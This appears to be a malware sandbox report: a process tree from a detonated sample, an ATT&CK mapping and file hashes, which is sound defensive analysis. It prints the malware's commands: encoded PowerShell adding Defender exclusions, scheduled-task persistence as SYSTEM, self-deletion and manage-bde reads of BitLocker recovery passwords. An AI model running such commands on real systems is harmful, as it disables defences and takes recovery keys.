C:\Users\Admin\AppData\Roaming\br30yxxIPR.exe"C:\Users\Admin\AppData\Roaming\br30yxxIPR.exe"8⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5924
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10453970101\but2.exe"C:\Users\Admin\AppData\Local\Temp\10453970101\but2.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:3336 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "PCI Bus Driver" /tr C:\Drivers\pcidrv.exe /sc minute /mo 1 /f7⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:5256
-
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "PCI Bus Driver Startup" /tr C:\Drivers\pcidrv.exe /sc onstart /ru SYSTEM /f7⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:6252
-
-
C:\Drivers\pcidrv.exeC:\Drivers\pcidrv.exe7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5116
-
-
C:\Windows\SysWOW64\cmd.exe"cmd" /C timeout /t 2 && del C:\Users\Admin\AppData\Local\Temp\10453970101\but2.exe7⤵
- System Location Discovery: System Language Discovery
PID:6168 -
C:\Windows\SysWOW64\timeout.exetimeout /t 28⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:6660
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10453980101\e187e4bdb4.exe"C:\Users\Admin\AppData\Local\Temp\10453980101\e187e4bdb4.exe"6⤵PID:6816
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵PID:7092
-
-
-
C:\Users\Admin\AppData\Local\Temp\10453990101\larBxd7.exe"C:\Users\Admin\AppData\Local\Temp\10453990101\larBxd7.exe"6⤵PID:4552
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy Cattle.psd Cattle.psd.bat & Cattle.psd.bat7⤵PID:18076
-
-
-
C:\Users\Admin\AppData\Local\Temp\10454000101\Rm3cVPI.exe"C:\Users\Admin\AppData\Local\Temp\10454000101\Rm3cVPI.exe"6⤵PID:17496
-
-
C:\Users\Admin\AppData\Local\Temp\10454010101\qhjMWht.exe"C:\Users\Admin\AppData\Local\Temp\10454010101\qhjMWht.exe"6⤵PID:27704
-
-
C:\Users\Admin\AppData\Local\Temp\10454020101\9sWdA2p.exe"C:\Users\Admin\AppData\Local\Temp\10454020101\9sWdA2p.exe"6⤵PID:37380
-
-
C:\Users\Admin\AppData\Local\Temp\10454030101\TbV75ZR.exe"C:\Users\Admin\AppData\Local\Temp\10454030101\TbV75ZR.exe"6⤵PID:4968
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵PID:27840
-
-
-
C:\Users\Admin\AppData\Local\Temp\10454040101\UZPt0hR.exe"C:\Users\Admin\AppData\Local\Temp\10454040101\UZPt0hR.exe"6⤵PID:36480
-
-
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc YQBEAGQALQBtAHAAUAByAGUAZgBlAFIARQBuAEMARQAgAC0AZQB4AGMAbABVAHMASQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwATQBvAGQAZQBcAEkAcwBWAGEAbAB1AGUAQwByAGUAYQB0AGUAZAAuAGUAeABlACwAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACwAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAgAC0AZgBvAFIAYwBFADsAIABhAEQAZAAtAG0AUABwAFIARQBmAGUAcgBlAE4AYwBFACAALQBlAFgAYwBsAFUAcwBJAE8AbgBwAFIAbwBDAGUAUwBzACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwATQBvAGQAZQBcAEkAcwBWAGEAbAB1AGUAQwByAGUAYQB0AGUAZAAuAGUAeABlACAALQBGAG8AcgBjAEUA1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6108
-
C:\Program Files\Mesh Agent\MeshAgent.exe"C:\Program Files\Mesh Agent\MeshAgent.exe"1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
PID:2160 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -noprofile -nologo -command -2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5636
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -noprofile -nologo -command -2⤵
- Command and Scripting Interpreter: PowerShell
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2416
-
-
C:\Users\Admin\AppData\Roaming\Mode\IsValueCreated.exeC:\Users\Admin\AppData\Roaming\Mode\IsValueCreated.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:5316 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe2⤵PID:6772
-
-
C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"1⤵PID:2244
-
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exeC:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe1⤵
- Executes dropped EXE
PID:4224
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exeC:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1484
-
C:\Program Files\Mesh Agent\MeshAgent.exe"C:\Program Files\Mesh Agent\MeshAgent.exe"1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
PID:1692 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -noprofile -nologo -command -2⤵
- Command and Scripting Interpreter: PowerShell
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1436
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -noprofile -nologo -command -2⤵
- Command and Scripting Interpreter: PowerShell
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2272
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:756
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"1⤵PID:4624
-
C:\Program Files\Mesh Agent\MeshAgent.exe"C:\Program Files\Mesh Agent\MeshAgent.exe"1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
PID:2824 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -noprofile -nologo -command -2⤵
- Command and Scripting Interpreter: PowerShell
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2304
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -noprofile -nologo -command -2⤵
- Command and Scripting Interpreter: PowerShell
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:7008
-
-
C:\Program Files\Mesh Agent\MeshAgent.exe"C:\Program Files\Mesh Agent\MeshAgent.exe"1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
PID:1392 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -noprofile -nologo -command -2⤵
- Command and Scripting Interpreter: PowerShell
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:6524
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -noprofile -nologo -command -2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2036
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -noprofile -nologo -command -2⤵
- Command and Scripting Interpreter: PowerShell
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:6396
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -noprofile -nologo -command -2⤵
- Command and Scripting Interpreter: PowerShell
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1804
-
-
C:\Windows\system32\cmd.exe/c manage-bde -protectors -get C: -Type recoverypassword2⤵PID:2468
-
C:\Windows\system32\manage-bde.exemanage-bde -protectors -get C: -Type recoverypassword3⤵PID:5648
-
-
-
C:\Windows\system32\cmd.exe/c manage-bde -protectors -get F: -Type recoverypassword2⤵PID:6164
-
C:\Windows\system32\manage-bde.exemanage-bde -protectors -get F: -Type recoverypassword3⤵PID:700
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"1⤵PID:7016
-
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exeC:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe1⤵
- Executes dropped EXE
PID:2764
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exeC:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Identifies Wine through registry keys
PID:6940
-
C:\Drivers\pcidrv.exeC:\Drivers\pcidrv.exe1⤵PID:5612
-
C:\Users\Admin\AppData\Local\Temp\dbf9c9b26f\tgvazx.exeC:\Users\Admin\AppData\Local\Temp\dbf9c9b26f\tgvazx.exe1⤵PID:5572
-
C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"1⤵PID:3008
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\PdxWM4xU\IaUVbBF4DrdN3I5R.exe1⤵PID:7032
-
C:\Users\Admin\AppData\Local\Temp\PdxWM4xU\IaUVbBF4DrdN3I5R.exeC:\Users\Admin\AppData\Local\Temp\PdxWM4xU\IaUVbBF4DrdN3I5R.exe2⤵PID:18092
-
C:\Users\Admin\AppData\Local\Temp\j31a6zha\27FKDBm5TrU5DjQZ.exeC:\Users\Admin\AppData\Local\Temp\j31a6zha\27FKDBm5TrU5DjQZ.exe 180923⤵PID:18140
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 18140 -s 6364⤵
- Program crash
PID:19032
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc YQBEAGQALQBNAHAAUABSAGUARgBlAHIARQBuAEMAZQAgAC0ARQB4AGMAbAB1AHMASQBvAE4AUAByAE8AYwBlAHMAUwAgAEEAZABkAEkAbgBQAHIAbwBjAGUAcwBzAC4AZQB4AGUAIAAtAGYATwBSAEMAZQA=1⤵
- Command and Scripting Interpreter: PowerShell
PID:12540
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 2612 -ip 26121⤵PID:17968
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 18140 -ip 181401⤵PID:18948
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 6944 -ip 69441⤵PID:25348
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 25368 -ip 253681⤵PID:2224
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 18016 -ip 180161⤵PID:27572
-
C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"1⤵PID:37500
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1System Services
2Service Execution
2Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Create or Modify System Process
7Windows Service
7Modify Authentication Process
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Create or Modify System Process
7Windows Service
7Scheduled Task/Job
1Scheduled Task
1Defense Evasion
File and Directory Permissions Modification
1Impair Defenses
6Disable or Modify Tools
5Modify Authentication Process
1Modify Registry
8Virtualization/Sandbox Evasion
2Credential Access
Modify Authentication Process
1Steal Web Session Cookie
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
154KB
MD52701477f44fb55cf996064c3ac19a8da
SHA1483ca29b5c4cc2c1ebb977de7a106d8a240dccd2
SHA2568813b7b9ac88365d8d9c3150e926420acc6b34b38624810720e3b66a697d5217
SHA51283c94d73a96d02ec5bd4c46d57c6e9f44a6984da6bbedacd33ec336c0a9dc3e137b977285cd97b65e0b5b0875f7ed76c07a8cfd0ee8d58e0f47671f2bde95522
-
Filesize
3.3MB
MD591424f307b7f0e238aab1f06434a7dc4
SHA14fb5ec3082d3545a79e2ccbd4b624320cafd68f1
SHA256cdc2aa09167bd32f9a01eb60414d0b8faaf8616b9a23a7fc1671bb6bc7f162a1
SHA5126830052ce91c378e7e21c385fb9a522f57fa59d1082a460a26199dbcfa808b37abad741eb8bf7dfd746d522d37dc03ac9d1674fb429f988873eb6a53fde93f83
-
Filesize
366B
MD59430c45765aa15e10bf9b3684c5771e3
SHA15967b1b62baa3b8048c552c242a11fca8dac5a38
SHA2567e1eafb4eea5ff326df33550a0a18612fb37656a72abb6cf21f3425c1bc77aff
SHA51241a681095593bb7c272227ea2df5dc58265543ff7f2bd0e1e8f8b9041cd1b291707d948ad06abaaeb1dd65c8d1c39317183ac1523936eae0c3405fcdbe6514ba
-
Filesize
31KB
MD5202a18c2c89c0667f0731a539b046679
SHA14c0770352ba132e188361f39fa1e27f371672e21
SHA25627ff3ae2d9423bad89ec912be0225cdc90390e5ce418118b0fe01956ee52ffd4
SHA512e38813d450a367709f1edd7ba7d6237b9bf5abeead3bcab6069cd273c03965da4758ea0138e1fd9564de1d91ac0c66d1c2041c4bb2878dd160abfe2b07328994
-
Filesize
96KB
MD56066c07e98c96795ecd876aa92fe10f8
SHA1f73cbd7b307c53aaae38677d6513b1baa729ac9f
SHA25633a2357af8dc03cc22d2b7ce5c90abf25ac8b40223155a516f1a8df4acbf2a53
SHA5127d76207c1c6334aa98f79c325118adf03a5ba36b1e2412803fd3e654a9d3630c775f32a98855c46342eba00d4a8496a3ded3686e74beaac9c216beee37aa5cb7
-
Filesize
40KB
MD5dfd4f60adc85fc874327517efed62ff7
SHA1f97489afb75bfd5ee52892f37383fbc85aa14a69
SHA256c007da2e5fd780008f28336940b427c3bfd509c72a40bfb7759592149ff3606e
SHA512d76f75b1b5b23aa4f87c53ce44c3d3b7e41a44401e53d89f05a114600ea3dcd8beda9ca1977b489ac6ea5586cf26e47396e92d4796c370e89fab0aa76f38f3c4
-
Filesize
251KB
MD558d3a0d574e37dc90b40603f0658abd2
SHA1bf5419ce7000113002b8112ace2a9ac35d0dc557
SHA256dcc05c3ac7ae22d601bcb7c97cfcda568f3041bd39b2fd8899282dfde83369a5
SHA512df61329a32e9261b01c5b7d95e0d9a3fb8cc36e5d90ede72bc16befe00fb32c221898a8346db9de07c0f5dcba57dcdbb09a22ca8b73223f989d33ec433c3a90a
-
Filesize
1.3MB
MD597c49181dbb0062cf2a18a636cccb319
SHA1f720a61758c7923c72f82341398539cdbf6052bb
SHA2560e88262fc03a25cd71e0592fd5fdb6bb70ac10f81c25312cdb53e0d2da64ad5e
SHA5125e5846586bf9934d8af254a41638dbddb2be10d48fbb2362bc1dc18f6d7009624a061f06ae5ec624ac147db8e60a9f8f0f0887f5597811abb3825b875e107956
-
Filesize
40B
MD5e583b3bcd0a283734268ceaab094ecf6
SHA131cd245bfde1e6f488730f052d6d37bbcfe470ea
SHA256a143092cbf17b2e36e7b5e9ec5058a2154cca9ac0c2b5841855c07439ae6c509
SHA5123168641a34bfeed7098fe87c75ab92337c94baf76d8725e295a411853381514748e71a0c4c527893a653e1a30d0cf1b540ede8ba480ca655af78cbec0b259e21
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
Filesize
80KB
MD5ecab15d150f0d912e19ea17b33e3954b
SHA1ad454091c6eb18101b40eee518d4215296a90ebc
SHA256610af30b207245294c0fed9da6e78ce35bedc7f1ba77d6c437b9ff5edb4ef43a
SHA5120887e2eaea8d8c1b935dc39324448db83cb01273da66fa5d0726f86f6438439e221f66702ff419361ab6d66d6db060e8393bf93a697e2ea0c9d2437b4b2ae791
-
Filesize
2KB
MD525604a2821749d30ca35877a7669dff9
SHA149c624275363c7b6768452db6868f8100aa967be
SHA2567f036b1837d205690b992027eb8b81939ba0228fc296d3f30039eeba00bd4476
SHA512206d70af0b332208ace2565699f5b5da82b6a3806ffa51dd05f16ab568a887d63449da79bbaeb46183038837446a49515d62cb6615e5c5b27563cd5f774b93f5
-
Filesize
280B
MD5f93dcd810ab757a40a2813b6800cacc5
SHA1553ae63db159ecf36dd04d7425a122badab1c331
SHA256b82cf44370ed436491d60052b707a2637a58e8cf563b682f7b7c234e31534b24
SHA512383b4020339fd5b502f0337ec3a6f46c9296e2cce54fae79a60801a1d16fe8329271087633e10815ceeb21ea35f8f7b53dcba26c2fdd4237e2747b660194c5ed
-
Filesize
280B
MD5690f9d619434781cadb75580a074a84d
SHA19c952a5597941ab800cae7262842ab6ac0b82ab1
SHA256fc2e4954dbe6b72d5b09e1dc6360ea699437a2551355c2950da0b3d3a4779fc1
SHA512d6b1da8e7febf926e8b6c316164efbbac22c7c3d9e4933a19fffba3d1667e1993cdeb5064aa53816c0c53f9d2c53e204772de987eb18adbb094a0fb84ae61fa9
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\5e133f3a-4b78-45a4-b094-a6830cf7b9d6.tmp
Filesize1B
MD55058f1af8388633f609cadb75a75dc9d
SHA13a52ce780950d4d969792a2559cd519d7ee8c727
SHA256cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8
SHA5120b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21
-
Filesize
40B
MD520d4b8fa017a12a108c87f540836e250
SHA11ac617fac131262b6d3ce1f52f5907e31d5f6f00
SHA2566028bd681dbf11a0a58dde8a0cd884115c04caa59d080ba51bde1b086ce0079d
SHA512507b2b8a8a168ff8f2bdafa5d9d341c44501a5f17d9f63f3d43bd586bc9e8ae33221887869fa86f845b7d067cb7d2a7009efd71dda36e03a40a74fee04b86856
-
Filesize
17KB
MD592f526f755b48280a56c607451e2bf12
SHA174d0e0187b4c1291db261dcde09eab23228f4b8d
SHA256791b8b2abdf057d74cdb511c83182811efb27a8026a2e5c58656922932523c0a
SHA5121861b9505203bb9e89f321ea2cd4eafff41fff65f17000079a9509e601f035313705b55db1d49ef1b487df3cf3974d145716e4d836d6aaa2d08d224eca22c852
-
Filesize
36KB
MD55de930a1a5e799c2361f8f50a4032f5a
SHA1b0187a2d46f4bb1df5a2f70b137d21c26e61ea71
SHA256dbd793d4032175eeee90a70433aa51b334cb57cd93e9ad76df73b79b1e0c888b
SHA5126b2b7741547d9f1785997cb1b3e32bba87c371763e15614b2a63fc2e00fed50677e0f0c3d2aa4b6d26f59fc4a19feb5ffb5119a3679fe8085f20edd64208917f
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\43777905-94d9-469f-bdca-c5a9e2858271\index-dir\the-real-index
Filesize1KB
MD5c1e9944c234591d3af8b8e3e6a0c3b25
SHA137d4422ef79a3f9ae0178e10f527d103929ab05e
SHA2564c24dfd0ff0cf7e581b3c1748308046bb03125baadda1b1aac7124ac269b88d0
SHA512785119a4988c7105d7b58fe2051b9e33743a8a09cbdd7e894015ac72825fa29360e19d03808b98e743eb725e93f522c884ee41f6c094711873f40b524ea44f4d
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\43777905-94d9-469f-bdca-c5a9e2858271\index-dir\the-real-index~RFe58219c.TMP
Filesize1KB
MD595d7177de35e18355831c787a16b7751
SHA1f9574494d027d2fefe34d6be5348c15cbda236c3
SHA256df6a76e2f5a0be1601a079e671b988f47a81e5c85afada76bf82960a29591e65
SHA5127f468e4db7982130c4f90bd95afbf8e155a82078a954372d684abf42b939359f4edff8165c594c524eb5afb380cb4e57bde746e381426ff5c6455b611a602e12
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\index.txt
Filesize325B
MD58109df5f2a1dad8556839a382f4f20ff
SHA1aa69926ae6ea95e61abd475b8636dfddf9a66a07
SHA25607334926611f10a70fd424c1b8c618f8af34136fcdb791ef65cd2e4f0e4857b9
SHA5120f77a6ccead75b330d72ae916c10f8746159968a831afb91f338c8944154cc8b9628362e7dd722e332cbb8b13f6472ffe760101090cabf1ed8e6dfc0f9029a9a
-
Filesize
40KB
MD5861196b0d6be3242e4a7aecaaee6021f
SHA1e6051b5cb5cff531c26e66151fc894f3073660ad
SHA256e9b8f91ab0c70a34fbc20053e756e0400327b9c7e1bb33aefd460bb89af72b5f
SHA51235d1b0c7c6c5d6ba8cac3f02c6cc1d3355750459cabc33a0c82df10d3ca85698c8ecd5a60fe74e83202aa95ead4fe9cf69725203cfd9c6fbe4d3a1e21f3b2c06
-
Filesize
40KB
MD5c4e1c49a75a3fdfcb50387f213061f4b
SHA154fcb1d869ab65d6fbe8126a85d556dd0c341ee7
SHA256cb9e30959cdeaae1bc5ff390fed1aaad126009ae1b9aa463086b7d76cfd7673c
SHA512f707f1168910d4723e006f6c0dc92000d766b943f1cdff2cb5be573f745df54ef66416fac059b7f1e85a0f0c1c960300c4fd6c714e96caa5af6a63132592da9f
-
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres
Filesize2KB
MD52e2c316e84fcbbec89fab7faa3707ed1
SHA1ef7cad304b6959a608c6458f062fc269306d926f
SHA2568abf2225d715463ba7d038b9925633d5b068bc74f940af5e077bc7618c471989
SHA51233f3e88816e095d53dd0218bf70403fb4218c09876760286daf1df0a606145d580813061d01234a605fe4657d260584f9a263cfc82fa865e9953a15604dd7471
-
Filesize
236KB
MD52ecb51ab00c5f340380ecf849291dbcf
SHA11a4dffbce2a4ce65495ed79eab42a4da3b660931
SHA256f1b3e0f2750a9103e46a6a4a34f1cf9d17779725f98042cc2475ec66484801cf
SHA512e241a48eafcaf99187035f0870d24d74ae97fe84aaadd2591cceea9f64b8223d77cfb17a038a58eadd3b822c5201a6f7494f26eea6f77d95f77f6c668d088e6b
-
Filesize
3.0MB
MD591f372706c6f741476ee0dac49693596
SHA18e8973d35d3de0ade6cc8e44cd21f2cffbdfe83d
SHA2569a401dded25b4bafd24225449ed48468787290bbb308dc5e40511da2858bb781
SHA51288b26c1c49bc2a77dbdcea0e22c33555932498b3a4cff66f6b08438c0d96a017367c14508249aa1ca2090ed0ca6081e28757fbda97f856675d9db9cc61f7b7ed
-
Filesize
1B
MD5cfcd208495d565ef66e7dff9f98764da
SHA1b6589fc6ab0dc82cf12099d1c2d40ab994e8410c
SHA2565feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9
SHA51231bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99
-
Filesize
16KB
MD5fce0276f46e3204832951f7f2f77675b
SHA1f8914b9913a1d20e42717844a06d976cfb8ced5f
SHA256aa69f10105043eff96e190881c47dc5c5daab318c26f4b6e9bfe32043749f9e4
SHA5121718d662dd87d03e97c08d7f93706688b65869ffe5ca425edf91b81bbd642499f101d10717e359e745ffe2419e2252ed1e123f15f51b1fea934f071f65837e16
-
Filesize
15KB
MD5ffa1da2a19ed4e77c663cf480535f9d5
SHA1ffea277c0a6016d65d741aff091654d8b23581ae
SHA2564dc981c184a605052977b03518f5479878d7ce0c25f8365c98e1bb25a71be454
SHA51276d424db1efb348ae3ef6d3890f7b9a6e6fabd1aa462f894aabc57297bed5d129299558ccb912bd2dc4f6f809aba8adcc705c2699367ae88dab65c57ad276c6e
-
Filesize
944B
MD59b80cd7a712469a4c45fec564313d9eb
SHA16125c01bc10d204ca36ad1110afe714678655f2d
SHA2565a9e4969c6cdb5d522c81ce55799effb7255c1b0a9966a936d1dc3ff8fe2112d
SHA512ac280d2623c470c9dec94726a7af0612938723f3c7d60d727eb3c21f17be2f2049f97bc8303558be8b01f94406781ece0ada9a3bc51e930aff20bebb6ca17584
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\hvtnam9x.default-release\activity-stream.discovery_stream.json.tmp
Filesize25KB
MD5ef60690a0904258c9eaf1837aef21283
SHA15af9566cae629bb73f11262ea13ea5aae2149cb5
SHA256f8ddd24b759ecc9147a7d76a99388ef318681898365f7e9ed200ae80186b91e1
SHA5125fde204f694e38fb5fde07e77a2955a634206b3f9576a133e7b5995d980ae3856a93e0ffd12a4e966af09adb63a9038b3f38a71c4ca4ff0de12598c8259132af
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\hvtnam9x.default-release\cache2\entries\A585344A45AF937E3AB7D706291A9A3ED8D581D9
Filesize13KB
MD57bc0be19f339e6292e76584f13ee7a88
SHA18a9a41d5c4d19aa499bb5b0b14fa3c15db934d4e
SHA256d548ef46c4bcc939a4fa304053e0d786e903c78177892dc7be786e747c162aa4
SHA5122195c8256fc84c26eda6a618969de3073d4977acc380b11094802c6ca7139610b9dc6e8ad60db7a48ac90cd0c9be3143c284441b57e24859c3e88c5e5f5c1d28
-
Filesize
1.8MB
MD57c9ce5764052f025a862034e359eec34
SHA1cd230e017f20e36b8289b510adcbddaa78fb187c
SHA2562b9de7edc4e610f09b1cb71fd7a5e843a07f4cc71b2ffc2bea48646e5600161a
SHA5127370011b9772e0cb3a69a0b1f314e05ae1cf66203dc95b6ed4a20e760caa029222db0a7e58e1442e52d79d75739bdb9827329170393bf9d2bb9c3fb9514135d5
-
Filesize
731KB
MD519f7ffacb30894b7adf9414150b1c723
SHA19151fbe3c9afaf82a5f0e842c0d8d7b11454ac17
SHA2566736fc5910c521c3b94093d44f0b8774b32c579a354fd2d850bd686766b0b696
SHA512d728408d2274c3e36be7b27fefaed3673a8a1c2fee3ff9fda87663e7eef6f506d29d101dad4b391ac0f68902d7048cbba0b93e8988c01d44fa6cb2088885e1c9
-
